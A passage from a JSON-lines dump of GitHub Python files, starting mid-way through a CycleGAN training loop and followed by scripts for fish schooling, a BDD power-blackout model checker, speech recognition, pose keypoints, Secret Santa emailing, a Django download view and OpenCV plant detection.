disc_a.trainable_weights + disc_b.trainable_weights\n disc_loss = (disc_a_loss + disc_b_loss) * 0.5\n discriminator_updater = adam_disc.get_updates(discriminator_weights, [], disc_loss)\n\n # Prepare generator updater\n generator_weights = gen_a2b.trainable_weights + gen_b2a.trainable_weights\n gen_loss = (gen_a2b_loss + gen_b2a_loss + lmda * cyclic_loss)\n generator_updater = adam_gen.get_updates(generator_weights, [], gen_loss)\n\n # Define trainers\n generator_trainer = K.function([true_a, true_b], [gen_a2b_loss, gen_b2a_loss, cyclic_loss], generator_updater)\n discriminator_trainer = K.function([true_a, true_b, fake_pool_a, fake_pool_b], [disc_a_loss / 2, disc_b_loss / 2],\n 
discriminator_updater)\n\n epoch_counter = 1\n\n plotGeneratedImages(epoch_counter, dataset, batch_size, gen_a2b, gen_b2a)\n\n # Start training\n for e in range(1, epochs + 1):\n print('\n', '-' * 15, 'Epoch %d' % e, '-' * 15)\n gc.collect()\n\n # Learning rate decay (compute from baselr so the local name is always bound)\n if use_decay and (epoch_counter > 100):\n lr = baselr - (epoch_counter - 100) * baselr / 100\n adam_disc.lr = lr\n adam_gen.lr = lr\n\n # Initialize progbar and batch counter\n # progbar = generic_utils.Progbar(batchCount)\n\n # np.random.shuffle(x_train_a)\n # np.random.shuffle(x_train_b)\n print(f\"Batch count: {batchCount}\")\n # Cycle through batches\n for i in trange(1000):\n\n # Select true images for training\n # true_batch_a = x_train_a[np.random.randint(0, x_train_a.shape[0], size=batch_size)]\n # true_batch_b = x_train_b[np.random.randint(0, x_train_b.shape[0], size=batch_size)]\n\n true_batch_a, true_batch_b, load_time = next(load_batch(dataset, batch_size, is_testing=False, ))\n print(f\"Load time: {load_time}\")\n # true_batch_a = x_train_a[i * batch_size:i * batch_size + batch_size]\n # true_batch_b = x_train_b[i * batch_size:i * batch_size + batch_size]\n\n # Fake images pool\n a2b = gen_a2b.predict(true_batch_a)\n b2a = gen_b2a.predict(true_batch_b)\n\n tmp_b2a = []\n tmp_a2b = []\n\n for element in a2b:\n if len(pool_a2b) < 50:\n pool_a2b.append(element)\n tmp_a2b.append(element)\n else:\n p = random.uniform(0, 1)\n\n if p > 0.5:\n index = random.randint(0, 49)\n tmp = np.copy(pool_a2b[index])\n pool_a2b[index] = element\n tmp_a2b.append(tmp)\n else:\n tmp_a2b.append(element)\n\n for element in b2a:\n if len(pool_b2a) < 50:\n pool_b2a.append(element)\n tmp_b2a.append(element)\n else:\n p = random.uniform(0, 1)\n\n if p > 0.5:\n index = random.randint(0, 49)\n tmp = np.copy(pool_b2a[index])\n pool_b2a[index] = element\n tmp_b2a.append(tmp)\n else:\n tmp_b2a.append(element)\n\n pool_a = np.array(tmp_b2a)\n pool_b = np.array(tmp_a2b)\n\n # Update network and obtain losses\n disc_a_err, disc_b_err = discriminator_trainer([true_batch_a, true_batch_b, pool_a, pool_b])\n gen_a2b_err, gen_b2a_err, cyclic_err = generator_trainer([true_batch_a, true_batch_b])\n\n # progbar.add(1, values=[\n # (\"D A\", disc_a_err*2),\n # (\"D B\", disc_b_err*2),\n # (\"G A2B loss\", gen_a2b_err),\n # (\"G B2A loss\", gen_b2a_err),\n # (\"Cyclic loss\", cyclic_err)\n # ])\n\n # Save losses for plotting\n disc_a_history.append(disc_a_err)\n disc_b_history.append(disc_b_err)\n\n gen_a2b_history_new.append(gen_a2b_err)\n gen_b2a_history_new.append(gen_b2a_err)\n\n # cycle_history.append(cyclic_err[0])\n plotLoss_new()\n\n plotGeneratedImages(epoch_counter, dataset, batch_size, gen_a2b, gen_b2a)\n\n saveModels(epoch_counter, dataset, gen_a2b, gen_b2a, disc_a, disc_b)\n saveModels('latest', dataset, gen_a2b, gen_b2a, disc_a, disc_b)\n\n epoch_counter += 1\n\n if end_of_epoch_callback is not None:\n end_of_epoch_callback()\n\n\ndef end_of_epoch_callback():\n print(\"potato\")\n\n\nif __name__ == '__main__':\n train(200, 1, \"n-yandex\", lr, use_decay=True, use_pseudounet=False, use_unet=False, plot_models=False,\n end_of_epoch_callback=end_of_epoch_callback)\n# tensorflowjs_converter --input_format keras models/n-yandex_latest_256x256_generatorA2B.h5 out/","repo_name":"DexterHuang/cycleGAN","sub_path":"cycleGAN.py","file_name":"cycleGAN.py","file_ext":"py","file_size_in_byte":15413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9975974390","text":"\"\"\" \norientation.py \n\nPlot the distribution of orientation angles of nearest\nneighbouring prey fish.\n\"\"\"\n\nfrom fishmodel import Environment, Prey, Predator, Food\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom fishmodel import fast_norm\nfrom parameter_fit import fit_params\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import animation\nfrom scipy import stats\nfrom progress.bar import Bar\n\ndef get_angle(v1, v2):\n cosang = np.dot(v1, v2)\n sinang = fast_norm(np.cross(v1, v2))\n return np.arctan2(sinang, cosang)\n\ndef get_closest_angle(prey, neighbors):\n i = get_closest_neighbor(prey, neighbors)\n\n return get_angle(prey.vel, neighbors[i].vel)\n\ndef get_closest_neighbor(prey, neighbors):\n \"\"\" Returns distance to nearest neighbor\"\"\"\n all_dist = []\n for n in neighbors:\n if n is not prey:\n all_dist.append(fast_norm(prey.pos - n.pos))\n return all_dist.index(np.min(all_dist))\n\ndef nn_orientation(env, timesteps=700):\n y = []\n bar = Bar(\"timesteps\", max=timesteps)\n for _ in range(timesteps):\n angles = []\n n = 0\n for prey in env.prey:\n if not prey.active:\n continue\n\n angles.append(get_closest_angle(prey, env.prey))\n n += 1\n\n average = np.sum(angles) / n\n y.append(average)\n env.timestep()\n bar.next()\n bar.finish()\n return np.array(y)\n\nif __name__ == \"__main__\":\n env = Environment(20, 0)\n angles = nn_orientation(env)\n\n\n plt.figure(figsize=(8, 7))\n x = np.linspace(-0.7, 1.7, 100)\n plt.plot(x, stats.norm.pdf(x, np.mean(angles), np.std(angles)))\n plt.ylabel('probability density')\n plt.xlabel(r'$\\theta_{nn}$')\n print('mean', np.mean(angles), 'std', np.std(angles))\n\n plt.show()","repo_name":"daanvinken/FishSchooling","sub_path":"orientation.py","file_name":"orientation.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37977949080","text":"# -*- coding: gb18030 -*-\n\n\nfrom SpaceCopy import SpaceCopy\nfrom interface.SpaceCopyRaidRecordInterface import SpaceCopyRaidRecordInterface\n\nMIN_TEAM_MEMBER_COUNT\t= 3\n\nclass SpaceCopyTianguan( SpaceCopy, SpaceCopyRaidRecordInterface ):\n\t\"\"\"\n\t\"\"\"\n\tdef __init__(self):\n\t\tSpaceCopy.__init__( self )\n\t\tSpaceCopyRaidRecordInterface.__init__( self )\n\t\tself.spawnMonstersList = {}\n\n\n\tdef addSpawnPointTianguan( self, spawnMailBox, grade, teamcount ):\n\t\t\"\"\"\n\t\tdefine method\n\t\t空间管理着一批刷怪点\n\t\t\"\"\"\n\t\tkey = str(grade) + \"and\" + str(teamcount)\n\t\tif not self.spawnMonstersList.has_key( key ):\n\t\t\tself.spawnMonstersList[key] = [spawnMailBox]\n\t\telse:\n\t\t\tself.spawnMonstersList[key].append( spawnMailBox )\n\n\n\tdef spawnMonsters( self, params ):\n\t\t\"\"\"\n\t\tdefine method\n\t\t\"\"\"\n\t\ttc = params[\"teamcount\"]\n\t\tif tc < 3:\n\t\t\ttc = 3\n\t\tfor i in xrange( MIN_TEAM_MEMBER_COUNT, tc + 1 ):\n\t\t\tkey = str(params[\"grade\"]) + \"and\" + str(i)\n\t\t\tif not key in self.spawnMonstersList:\n\t\t\t\tcontinue\n\t\t\tfor j in self.spawnMonstersList[key]:\n\t\t\t\td = {}\n\t\t\t\td[ \"tianguan_level\" ] = params[\"copyLevel\"]\n\t\t\t\td[ \"current_toll_gate\" ] = params[\"grade\"]\n\t\t\t\tj.cell.createEntity( d )\n\n\tdef onEnter( self, baseMailbox, params ):\n\t\t\"\"\"\n\t\tdefine method.\n\t\t玩家进入了空间,需要根据副本boss的击杀情况给予玩家\n\t\t相应的提示,并让玩家选择是继续副本还是离开副本。\n\t\t@param baseMailbox: 玩家mailbox\n\t\t@type baseMailbox: mailbox\n\t\t@param params: 玩家onEnter时的一些额外参数\n\t\t@type params: py_dict\n\t\t\"\"\"\n\t\tSpaceCopy.onEnter( self, baseMailbox, params )\n\t\tSpaceCopyRaidRecordInterface.onEnter( self, baseMailbox, params )\n","repo_name":"mudsave/csol2_enities_45541","sub_path":"base/SpaceCopyTianguan.py","file_name":"SpaceCopyTianguan.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9991514576","text":"from dd import autoref as _bdd\nimport xml.etree.ElementTree as ET\nfrom collections import OrderedDict\nimport re\n\nclass blackout_BDD():\n def __init__(self, varList, simulationData = None ):\n assert(varList != None)\n self.vars = varList # TopologyData is a list of labels associated to variables.\n self.bdd_initiatingEvents = _bdd.BDD()\n self.bdd_transitionRelation = _bdd.BDD()\n self.InitiatingEvents = \"\"\n self.TransitionRelation = \"\"\n self.initiatingEventExpr = self.bdd_initiatingEvents.false\n self.transitionRelationExpr = self.bdd_transitionRelation.false\n self.primes = OrderedDict()\n self.qvars = list()\n self.counter = 0\n for var in self.vars:\n self.bdd_initiatingEvents.add_var(var)\n self.bdd_transitionRelation.add_var(var)\n self.bdd_transitionRelation.add_var(var + 'p')\n self.primes[var + 'p'] = var\n self.qvars.append(var)\n if not simulationData is None:\n self.xmlfile = simulationData\n self.createBDDs()\n\n def updateInitiatingEvents(self, newEvaluation):\n self.initiatingEventExpr = self.initiatingEventExpr | newEvaluation\n\n def updateTransitionRelation(self, newRelation):\n self.transitionRelationExpr = self.transitionRelationExpr | newRelation\n\n def createBDDs(self):\n root = ET.parse(self.xmlfile).getroot()\n for path in root.iter('Path'):\n self.counter = self.counter + 1\n initial_outages = list()\n for Initial_Stage in path.iter('Initial_Stage'):\n for outage in Initial_Stage.iter('Outage'):\n initial_outages.append(outage.text)\n self.updateInitiatingEvents(self.bdd_initiatingEvents.add_expr(self.getExpressionStringInitial(initial_outages)))\n for Cascade_stage in path.iter('Cascading_Stage'):\n for StageNum in Cascade_stage.iter('Stage_Number'):\n cascade_outages = list()\n for outage in StageNum.iter('Outage'):\n cascade_outages.append(outage.text)\n self.updateTransitionRelation(self.bdd_transitionRelation.add_expr(self.getTransitionString(initial_outages, cascade_outages)))\n initial_outages.extend(cascade_outages)\n if self.counter == 300:\n break\n\n #dumping the bdds in a pickle file\n self.bdd_initiatingEvents.dump('InitiatingEventsExpr.p',[self.initiatingEventExpr])\n self.bdd_transitionRelation.dump('TransitionRelationExpr.p',[self.transitionRelationExpr])\n\n def printInitiatingEventsBDD(self):\n self.bdd_initiatingEvents.dump('InitiatingEvents.pdf', [self.initiatingEventExpr])\n\n def printTransitionRelationsBDD(self):\n self.bdd_transitionRelation.dump('TransitionRelation.pdf', [self.transitionRelationExpr])\n\n def getExpressionStringInitial(self,outage):\n initial_string = \"\"\n for item in self.vars:\n if item in outage:\n if initial_string:\n initial_string = initial_string + ' & ' + '!' + item\n else:\n initial_string = '!' + item\n else:\n if initial_string:\n initial_string = initial_string + ' & ' + item\n else:\n initial_string = item\n return initial_string\n\n\n def getExpressionStringTransition(self,prevOutage_dict, nextOutage_dict):\n answer1 = \"\"\n answer2 = \"\"\n for key in prevOutage_dict:\n if answer1:\n op = \" & \"\n else:\n op = \"\"\n if prevOutage_dict[key] :\n answer1 = answer1 + op + key\n else:\n answer1 = answer1 + op + '!' + key\n for key in nextOutage_dict:\n if answer2:\n op = \" & \"\n else:\n op = \"\"\n if nextOutage_dict[key] :\n answer2 = answer2 + op + key + 'p'\n else:\n answer2 = answer2 + op + '!' 
+ key + 'p'\n return answer1 + ' & ' + answer2\n\n def getTransitionString(self, prev, next_):\n prevString = OrderedDict()\n nextString = OrderedDict()\n for var in self.vars:\n prevString[var] = True\n nextString[var] = True\n for item in prev:\n prevString[item] = False\n nextString[item] = False\n for item in next_:\n nextString[item] = False\n return self.getExpressionStringTransition(prevString, nextString)\n\n\n def checkInitialState(self, currentState):\n return self.bdd_initiatingEvents.evaluate(self.initiatingEventExpr, currentState)\n\n def checkSystemState(self, currentState):\n if self.bdd_initiatingEvents.evaluate(self.initiatingEventExpr, currentState) != -1:\n return self.getFixedPointPath(currentState)\n else:\n return False\n\n def getFixedPointPath(self, currentState):\n path = list();\n initial = self.bdd_transitionRelation.add_expr(self.dictToList(currentState))\n while(self.bdd_transitionRelation.sat_len(initial) != 0):\n temp = _bdd.image(self.transitionRelationExpr, initial, self.primes, self.qvars, self.bdd_transitionRelation)\n path.append(list(self.bdd_transitionRelation.sat_iter(temp)))\n initial = temp\n return path\n\n def dictToList(self, state):\n answer = \"\"\n for var in self.vars:\n if answer:\n if state[var]:\n answer = answer + ' & ' + var\n else:\n answer = answer + ' & ' + '!' + var\n else:\n if state[var]:\n answer = var\n else:\n answer = '!' + var\n return answer\n","repo_name":"chhokrad/BDD_POWER","sub_path":"Code/SymbolicModelCheckerWOS.py","file_name":"SymbolicModelCheckerWOS.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16709369930","text":"#coding=utf-8\nimport sys\n\nimport tensorflow as tf\n\nfrom model_speech.cnn_ctc_dataset import input_fn, load_vocab, load_data\nfrom model_speech.cnn_ctc_estimator_v2 import AMEstimator\n\nlabel_vocab = load_vocab(['./data/thchs_train.txt', './data/thchs_dev.txt', './data/thchs_test.txt'])\nwav_lst, pny_lst = load_data(['./data/thchs_train.txt'], './data/', size=4)\n# dev_wav_lst, dev_pny_lst = load_data(['./data/thchs_dev.txt'], './data/')\nconfig = tf.ConfigProto()\nconfig.intra_op_parallelism_threads = 8\nconfig.inter_op_parallelism_threads = 8\nrun_config = tf.estimator.RunConfig().replace(\n session_config=config)\nam = AMEstimator(len(label_vocab), 'train', label_vocab, './logs_am_new_3', None, run_config)\nresult = am.predict(input_fn = lambda: input_fn('pred', 4, wav_lst, pny_lst, label_vocab),\n predict_keys=None,\n hooks=None,\n checkpoint_path=None,\n yield_single_examples=True)\nprint(result)\n#\nfor r in result:\n text = []\n print(r['input_length'])\n # print(r['label_length'])\n for i in r['text_ids']:\n text.append(label_vocab[i])\n text = ' '.join(text)\n print('文本结果:', text)\n # text = []\n # for i in r['y_true']:\n # text.append(label_vocab[i])\n # text = ' '.join(text)\n # print('原文结果:', text)\n# print('原文结果:', ' '.join(feats['the_labels']))","repo_name":"nietao2/DeepSpeechRecognition","sub_path":"test_estimator_v2.py","file_name":"test_estimator_v2.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"40225495133","text":"import argparse\nimport logging\nimport time\nimport pickle\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom tf_pose.estimator import TfPoseEstimator\nfrom tf_pose.networks import get_graph_path, model_wh\n\ndef str2bool(v):\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='tf-pose-estimation realtime webcam')\n # parser.add_argument('--camera', type=int, default=0)\n\n parser.add_argument('--resize', type=str, default='0x0',\n help='if provided, resize images before they are processed. default=0x0, Recommends : 432x368 or 656x368 or 1312x736 ')\n parser.add_argument('--resize-out-ratio', type=float, default=4.0,\n help='if provided, resize heatmaps before they are post-processed. default=1.0')\n\n parser.add_argument('--model', type=str, default='mobilenet_thin', help='cmu / mobilenet_thin / mobilenet_v2_large / mobilenet_v2_small')\n parser.add_argument('--show-process', type=bool, default=False,\n help='for debug purpose, if enabled, speed for inference is dropped.')\n \n parser.add_argument('--tensorrt', type=str, default=\"False\",\n help='for tensorrt process.')\n parser.add_argument('--vidloc', type=str, default='')\n args = parser.parse_args()\n\n w, h = model_wh(args.resize)\n if w > 0 and h > 0:\n e = TfPoseEstimator(get_graph_path(args.model), target_size=(w, h), trt_bool=str2bool(args.tensorrt))\n else:\n e = TfPoseEstimator(get_graph_path(args.model), target_size=(432, 368), trt_bool=str2bool(args.tensorrt))\n cap = cv2.VideoCapture(args.vidloc)\n\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('input_pose.mp4', fourcc, 30.0, (640, 640))\n\n parts_frames = {}\n counter = 0\n while True:\n ret,image = cap.read()\n if ret==False:\n break\n print(image.shape)\n humans = e.inference(image, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)\n black = np.ones((640, 640, 3))\n image = TfPoseEstimator.draw_humans(black, humans, imgcopy=False)\n\n # cv2.imshow('tf-pose-estimation result', image)\n parts_points = {}\n list_of_parts = ['nose', 'sternum', 'right_shoulder', 'right_elbow', 'right_palm', \n 'left_shoulder', 'left_elbow', 'left_palm', 'right_hip', 'right_knee', \n 'right_ankle', 'left_hip', 'left_knee', 'left_ankle', 'right_eye', \n 'left_eye', 'right_ear', 'left_ear']\n for i, part in enumerate(list_of_parts):\n try:\n parts_points[part] = (int(humans[0].body_parts[i].x * 640), int(humans[0].body_parts[i].y * 640))\n except:\n parts_points[part] = (None, None)\n parts_frames[counter] = parts_points\n counter += 1\n # print(parts_points)\n # plt.imshow(image)\n # plt.show()\n image = image * 255\n image = np.uint8(image.astype(int))\n\n out.write(image)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Saving the objects:\nwith open('objs.pkl', 'wb') as f:\n pickle.dump(parts_frames, f)\nout.release()\ncap.release()\n","repo_name":"bipinkc19/squat-counter","sub_path":"get_points.py","file_name":"get_points.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"69"}
+{"seq_id":"38244060024","text":"import random\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\nSENDER_EMAIL = os.getenv(\"SENDER_EMAIL\")\nAPP_PASSWORD = os.getenv(\"APP_PASSWORD\")\n\nclass Participant:\n def __init__(self, participant_id, name, email=None, restrictions=[]):\n self.participant_id = participant_id\n self.name = name\n self.email = email\n self.restrictions = restrictions\n\ndef match_people(start_people):\n # randomize\n random.shuffle(start_people)\n # sort by number of restrictions: max to min\n people = sorted(start_people, key=lambda person: len(person.restrictions), reverse=True)\n potential_matches = people.copy()\n matches = {}\n\n # iterate from most restrictions to least restrictions, \n # trying to match most restricted people first\n for person in people:\n for i, potential_match in enumerate(potential_matches):\n # if potential_match is not also the person trying to be matched and\n # is not restricted and \n # does not have the person trying to get matched\n if (potential_match != person and\n potential_match.name not in person.restrictions and\n matches.get(potential_match) != person):\n matches[person] = potential_match\n potential_matches.pop(i)\n break\n \n # person could not be matched\n if i == len(potential_matches) - 1:\n # already gone through everything and matches is empty\n if not matches:\n return None\n\n # attempt to replace from an earlier match\n for i, (gifter, recipient) in enumerate(matches.items()):\n if (person != recipient and\n recipient.name not in person.restrictions and\n matches.get(recipient) != person and\n person.name not in gifter.restrictions):\n matches[gifter] = person\n matches[person] = recipient\n break\n \n # no replacements could be made\n if i == len(matches) - 1:\n return None\n \n return matches\n\n\ndef send_emails(matches, message_text, message_html):\n server = smtplib.SMTP_SSL(\"smtp.gmail.com\", 465)\n server.ehlo()\n server.login(SENDER_EMAIL, APP_PASSWORD)\n \n for gifter, recipient_name in matches:\n msg = MIMEMultipart(\"alternative\")\n msg[\"Subject\"] = \"Secret Santa\"\n msg[\"From\"] = f\"Secret Santa Organizer <{SENDER_EMAIL}>\"\n msg[\"To\"] = gifter[1]\n \n # Create the body of the message (a plain-text and an HTML version)\n text = f\"Your person is {recipient_name}.\\n\\n{message_text}\"\n \n html = f\"\"\"\\\n \n \n Your person is {recipient_name} .
\n {message_html}\n \n \n \"\"\"\n\n part1 = MIMEText(text, \"plain\")\n part2 = MIMEText(html, \"html\")\n\n msg.attach(part1)\n msg.attach(part2)\n\n server.sendmail(SENDER_EMAIL, gifter[1], msg.as_string())\n\n server.quit()\n\n\ndef log(matches):\n log_message = \"\"\n\n for gifter, recipient_name in matches:\n log_message += f\"{gifter[0]} has to get a gift for {recipient_name}\\n\"\n\n with open(\"secret_santa_log.txt\", \"w\") as f:\n f.write(log_message)\n\ndef get_organizer_emails(form):\n \"\"\"Get up to 15 organizer emails from an input form.\"\"\"\n\n return form.getlist(\"organizer\")[:15]\n\ndef get_participants(form):\n \"\"\"Get up to 100 participants from an input form.\"\"\"\n\n participants = []\n null_participants = 0\n for i in range(100):\n participant = form.getlist(f\"participant{i}\")\n\n if participant == []:\n null_participants += 1\n\n if null_participants >= 5:\n break\n \n continue\n\n name, email = participant\n \n if name == \"\" and email == \"\":\n continue\n \n # if the user inserted a name or email that was too long\n if len(name) > 50 or len(email) > 200:\n return []\n \n if name == \"\":\n name = email\n \n # set email to none if it is blank, organizers will have to contact\n elif email == \"\":\n email = None\n \n restrictions = [restriction for restriction in form.getlist(f\"participant{i}restriction\") if restriction != \"\"]\n\n participants.append(Participant(i, name, email, restrictions))\n \n return participants\n\n","repo_name":"sachinraja/secretsantaorganizer","sub_path":"app/utils/secret_santa.py","file_name":"secret_santa.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26521857727","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.conf import settings\nfrom . models import Msg\nfrom django.contrib import messages\nimport os\n# Create your views here.\n\n\n\nfrom django.http import HttpResponse\nimport os\n\ndef download_file(request):\n file_path = os.path.join('static/media/myfile.pdf') # Replace with the actual file path\n if os.path.exists(file_path):\n with open(file_path, 'rb') as file:\n response = HttpResponse(file.read(), content_type='application/octet-stream')\n response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(file_path)\n return response\n else:\n return HttpResponse('File not found.')\n\n\n\n\ndef index(request):\n if request.method == 'POST':\n name = request.POST.get('name')\n email = request.POST.get('email')\n phone = request.POST.get('phone')\n message = request.POST.get('message')\n msg=Msg(name=name, email=email, phone=phone, message=message)\n msg.save()\n messages.success(request, 'Contact added successfully!')\n return render(request, 'index.html')","repo_name":"varghesejojo/mywebsite","sub_path":"profileproject/proapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71506628379","text":"import cv2\nimport numpy as np\n\"\"\"\n자동 객체 인식을 위한 기초 전처리 \n\"\"\"\n\n\n# 색범위 필터링\ndef color_filter(img, lower, upper):\n \"\"\"\n 색상 필터링\n 참고) 필터링할 색 범위 지정(hsv system)에 대하여\n hsv 색공간은 h -> theta(θ), s -> r, v -> z 인 원주좌표계로 생각할 수 있다.\n 그러나 opencv 에서 색상(h) 범위는 0~179, 채도(s) 범위 0 ~ 255, 명암(v) 범위 0 ~ 255 이므로\n 원주좌표계 상에 표현된 hsv 값을 opencv의 스케일에 맞게 변환하여야 한다.\n\n Args:\n img: 처리 전 이미지, 3차원 numpy ndarray 객체\n lower: hsv 색공간에서 하한선, 길이가 3인 numpy array 객체\n upper: hsv 색공간에서 상한선, 길이가 3인 numpy array 객체\n\n returns:\n 지정 범위의 색을 제외한것을 False, 지정 범위의 색을 포함한것을 True로 하는 binary 이미지,\n 2차원 numpy ndarray 객체\n \"\"\"\n mask = cv2.inRange(img, lower, upper)\n result = cv2.bitwise_and(img, img, mask=mask)\n # mask_inverse = cv2.bitwise_not(mask)\n # result_inverse = cv2.bitwise_and(img_grass, img_grass, mask=mask_inverse)\n return mask\n\n# 경계선 감지\ndef boundary(img):\n \"\"\"\n 이미지의 경계선을 감지. 블러 처리 후 Canny edge filter 사용\n\n Args:\n img: 경계선을 감지할 이미지, cv2 img 객체\n\n returns:\n 경계선을 True로 하는 binary 이미지, 2차원 numpy ndarray 객체\n \"\"\"\n blur = cv2.GaussianBlur(img, ksize=(3, 3), sigmaX=50)\n result = cv2.Canny(blur, 100, 200)\n return result\n\n# 객체 탐지(레이블링)\ndef labeling(binary_mask, front_image, filter_size):\n \"\"\"\n 이어진 부분을 한 객체로 인식하고 인식된 부분을 직사각형으로 라벨링하여 표시하는 함수\n\n Args:\n binary_mask: component 인식을 위한 binary 이미지, numpy ndarray 객체\n front_image: 인식 결과를 합성할 원본 이미지, numpy ndarray 객체\n filter_size: threshold 크기, 이 값보다 작은 크기의 component는 무시한다, int 객체\n\n returns:\n binary 이미지를 분석하여 객체를 인식하고 그 결과를 원본 이미지에 라벨링한 bgr 이미지 리턴,\n 3차원 numpy ndarray 객체\n \"\"\"\n count, labels, stats, centroids = cv2.connectedComponentsWithStats(binary_mask)\n # img_gbr = cv2.cvtColor(binary_mask, cv2.COLOR_GRAY2BGR)\n\n for i in range(1, count):\n (x, y, w, h, area) = stats[i]\n if area < filter_size:\n continue\n cv2.rectangle(front_image, (x, y, w, h), (255, 0, 0))\n\n return front_image\n\ndef point_clustering(image_path):\n \"\"\"\n 경계선 검출, 색상 검출, morphology, conponent 인식 순으로 이미지를 처리한 후 레이블 클러스터링을 통해\n 식물을 인식하기 위한 함수\n\n Args:\n image_path: 분석 대상 이미지 경로, str 객체\n\n returns:\n 이미지 클러스터링을 위해 component를 인식후 centroid 와 함께 라벨링한 bgr 이미지, 3차원 numpy ndarray\n \"\"\"\n image_bgr = cv2.imread(image_path)\n image_hsv = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2HSV)\n\n # 색상 필터 적용을 위한 파라미터\n lower = np.array([26, 25, 25])\n upper = np.array([83, 245, 245])\n\n # 경계선 감지, 색상 감지\n boundary_mask = boundary(image_hsv)\n color_mask = color_filter(image_hsv, lower, upper)\n\n # 마스크 and 연산\n merged_mask = cv2.bitwise_and(boundary_mask, color_mask)\n\n # morphology 연산\n morph_gradient = cv2.morphologyEx(merged_mask, cv2.MORPH_CLOSE, None)\n morph_open = cv2.morphologyEx(morph_gradient, cv2.MORPH_OPEN, None)\n\n # component 인식\n count, labels, stats, centroids = cv2.connectedComponentsWithStats(morph_open)\n\n for i in range(1, count):\n (x, y) = centroids[i]\n (x_area, y_area, w, h, area) = stats[i]\n if area < 50:\n continue\n cv2.circle(image_bgr, (int(x), int(y)), 10, (255, 0, 0), 2)\n cv2.rectangle(image_bgr, (x_area, y_area, w, h), (0, 0, 255))\n\n return image_bgr\n\ndef label_clustering(image_path):\n \"\"\"\n 경계선 검출, 색상 검출, conponent 인식 순으로 이미지를 처리한 후 레이블 클러스터링을 통해\n 식물을 인식하기 위한 함수\n\n Args:\n image_path: 분석 대상 이미지 경로, str 객체\n\n returns:\n 이미지 클러스터링을 위해 component를 인식후 라벨링한 bgr 이미지, 3차원 numpy ndarray\n \"\"\"\n image_bgr = cv2.imread(image_path)\n image_hsv = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2HSV)\n\n # 색상 필터 적용을 위한 파라미터\n lower = np.array([26, 25, 25])\n upper = np.array([83, 245, 245])\n\n # 경계선 감지, 색상 감지\n 
boundary_mask = boundary(image_hsv)\n color_mask = color_filter(image_hsv, lower, upper)\n\n # 마스크 and 연산\n merged_mask = cv2.bitwise_and(boundary_mask, color_mask)\n\n # component 인식 후 레이블링\n result = labeling(merged_mask, image_bgr, 70)\n return result\n\ndef plant_boundary(image_path):\n \"\"\"\n 식물의 경계를 검출하는 함수\n\n Args:\n image_path: 분석 대상 이미지의 경로, str 객체\n\n returns:\n 식물의 경계를 검출한 binary 이미지, 2차원 numpy ndarray\n \"\"\"\n image_bgr = cv2.imread(image_path)\n image_hsv = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2HSV)\n image_gray = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2GRAY)\n\n # 색 범위 변수, 노랑~파랑의 범위 내에서 적절히 조정하였음\n lower1 = np.array([26, 70, 70])\n upper1 = np.array([83, 250, 250])\n\n # CLAHE\n # 히스토그램 균일화\n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))\n clahe_image = clahe.apply(image_gray)\n\n # 경계검출, 색상 검출\n boundary_canny = boundary(clahe_image)\n color_mask = color_filter(image_hsv, lower1, upper1)\n\n # 이진화된 영상에 and 연산 수행\n combined_mask = cv2.bitwise_and(boundary_canny, color_mask)\n\n # 모폴로지 연산: 그래디언트\n morph_gradient = cv2.morphologyEx(combined_mask, cv2.MORPH_GRADIENT, None)\n\n return morph_gradient\n\n\ndef main():\n boundary_img1 = plant_boundary(\"./test_image/for_rec.jpg\")\n boundary_img2 = plant_boundary(\"./test_image/se1.png\")\n\n\n # case1_img1 = point_clustering(\"./test_image/for_rec.jpg\")\n # case1_img2 = point_clustering(\"./test_image/se1.png\")\n #\n # case2_img1 = label_clustering(\"./test_image/for_rec.jpg\")\n # case2_img2 = label_clustering(\"./test_image/se1.png\")\n\n cv2.imshow('boundary_img1', boundary_img1)\n cv2.imshow('boundary_img2', boundary_img2)\n # cv2.imshow('case1_img1', case1_img1)\n # cv2.imshow('case1_img2', case1_img2)\n # cv2.imshow('case2_img1', case2_img1)\n # cv2.imshow('case2_img2', case2_img2)\n cv2.waitKey()\n cv2.destroyAllW\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"hyeonghak96/Mix_project","sub_path":"openCV_examples/image_filter.py","file_name":"image_filter.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
